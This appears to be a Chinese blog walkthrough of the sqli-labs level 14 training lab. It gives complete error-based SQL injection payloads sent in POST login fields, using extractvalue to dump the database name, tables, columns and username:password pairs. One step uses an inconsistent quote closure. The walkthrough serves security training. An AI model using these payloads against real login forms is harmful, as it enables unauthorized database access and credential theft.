sqli-labs第十四关——“POST报错注入

一:判断注入类型

和上一关一样,输入如下代码,回显报错,其余类型无回显

复制代码
uname=1"&passwd=123

判断为双引号字符型,尝试闭合

判断正确,成功登录

二:开始攻击

1.爆数据库名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

复制代码
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

复制代码
uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

复制代码
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花!! ❀❀❀

相关推荐
難釋懷3 分钟前
Redis分片集群伸缩
数据库·redis·缓存
阿贵---11 分钟前
实战:用Python开发一个简单的区块链
jvm·数据库·python
谪星·阿凯37 分钟前
SQL注入漏洞进阶篇:从盲注到WAF绕过的全面解析
数据库·sql·计算机网络
快乐柠檬不快乐1 小时前
使用Python操作文件和目录(os, pathlib, shutil)
jvm·数据库·python
V1ncent Chen1 小时前
SQL大师之路 13 聚合函数和分组
数据库·sql·mysql·数据分析
赵渝强老师1 小时前
【赵渝强老师】高斯数据库(openGauss)的体系架构
数据库·postgresql·opengauss·gaussdb·国产数据库
IvorySQL2 小时前
开源同行,感谢有你|IvorySQL 社区邀您领取贡献者证书
数据库·postgresql·开源
IvorySQL2 小时前
PostgreSQL 技术日报 (3月19日)|当 AI 代理开始批量创建数据库
数据库·postgresql·开源
2401_874732532 小时前
Python上下文管理器(with语句)的原理与实践
jvm·数据库·python
l1t2 小时前
与系统库同名python脚本文件引起的奇怪错误及其解决
开发语言·数据库·python